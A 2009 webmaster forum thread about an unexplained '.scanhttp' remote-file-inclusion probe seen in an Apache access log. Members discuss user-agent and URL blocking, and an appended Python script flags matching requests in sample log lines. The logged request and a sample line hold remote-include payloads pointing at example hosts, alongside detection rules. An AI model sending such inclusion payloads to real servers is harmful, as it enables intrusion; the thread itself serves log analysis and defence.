
Need to identify ".scan" exploit attempt

Russian server attempted to connect using .scanhttp and upload an exploit


Wizcrafts

1:01 am on Jul 14, 2009 (gmt 0)




Today I saw a new exploit attack in my Apache access log. I can't find any information via Google, so I am asking here. What exploit vector is this fellow in Saint Petersburg trying to use? I've never seen this one before and don't recognize the .scan control file type. What module uses that file type?

77.221.x.x - - [12/Jul/2009:13:44:09 -0700] "GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"

Thanx in advance!

[edited by: jdMorgan at 1:39 am (utc) on July 14, 2009]
[edit reason] example.com for members' safety. [/edit]

Wizcrafts

3:57 am on Jul 14, 2009 (gmt 0)




Oops! I'm sorry about that Jim.

jdMorgan

5:16 pm on Jul 14, 2009 (gmt 0)




No problem...

Personally, I don't know what these guys are up to, but I block any request that has "http" in the requested URL-path or query string, and I block libwww-perl with only a few exceptions.

Too many exploiters, so little time: I say 403 and be done with it...

Jim

Wizcrafts

5:34 pm on Jul 14, 2009 (gmt 0)




I do block all http include attempts. This .scan vector is new to me and I can't find what application it belongs to. I'm just curious what they are trying to exploit by getting a hidden server function named scan.

BTW: Half of the XSS injection probes coming from the USSR have the user agent "Mozilla/5.0" - which I also block. I have not seen one legitimate browser that goes by that exact user agent.
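The three blocking rules mentioned in the thread (jdMorgan's "http" in the requested path or query string and the libwww-perl user agent, and Wizcrafts' bare "Mozilla/5.0" user agent) can be checked offline against an Apache access log before being turned into server rules. The script below is an added example, not code posted by either member: it parses combined-format log lines and reports which rule each suspicious request trips. The sample log lines are constructed; the first is modelled on the request posted above, with the address replaced by a 192.0.2.0/24 documentation IP. The first rule is implemented as a match on an `http://` or `https://` scheme after percent-decoding, which is narrower than a plain "http" substring match and avoids flagging paths such as `/httpd-docs/`; widen it to `"http" in target.lower()` if you want jdMorgan's exact criterion.

```python
import re
from urllib.parse import unquote

# Regex for Apache's "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not from a real server). The first one is
# modelled on the request quoted in the thread, with a documentation IP.
SAMPLE_LOG = [
    '192.0.2.77 - - [12/Jul/2009:13:44:09 -0700] "GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [12/Jul/2009:13:50:00 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/2009060215 Firefox/3.0.11"',
    '192.0.2.33 - - [12/Jul/2009:14:02:31 -0700] "GET /search.php?q=test HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '192.0.2.51 - - [12/Jul/2009:14:10:05 -0700] "GET /page.php?inc=http%3A%2F%2Fremote.example.com%2Ffile.txt HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
]


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_request(entry):
    """Apply the three block rules from the thread; return the names of the rules that matched."""
    reasons = []
    # Percent-decode first so an encoded "http%3A%2F%2F" in the query string is caught as well.
    target = unquote(entry["target"])
    # Rule 1 (jdMorgan): a URL scheme anywhere in the requested path or query string.
    if re.search(r"https?://", target, re.IGNORECASE):
        reasons.append("url-in-request")
    ua = entry["ua"]
    # Rule 2 (jdMorgan): requests made with the libwww-perl library user agent.
    if ua.lower().startswith("libwww-perl"):
        reasons.append("libwww-perl")
    # Rule 3 (Wizcrafts): a user agent that is exactly "Mozilla/5.0" and nothing more.
    if ua == "Mozilla/5.0":
        reasons.append("bare-mozilla-ua")
    return reasons


def scan_log(lines):
    """Return [(host, target, reasons)] for every parseable line that trips at least one rule."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line: skip rather than guess
        reasons = flag_request(entry)
        if reasons:
            hits.append((entry["host"], entry["target"], reasons))
    return hits


if __name__ == "__main__":
    for host, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{host} {target} -> {', '.join(reasons)}")
```

Running the script on the sample lines flags the posted request on two rules (URL in the request and libwww-perl), the bare "Mozilla/5.0" request on the third rule, and the percent-encoded `http://` in a query string on the first rule only; the ordinary Firefox request passes clean. Counting hits per rule over a day's log is a cheap way to see how much legitimate traffic a new 403 rule would catch before deploying it.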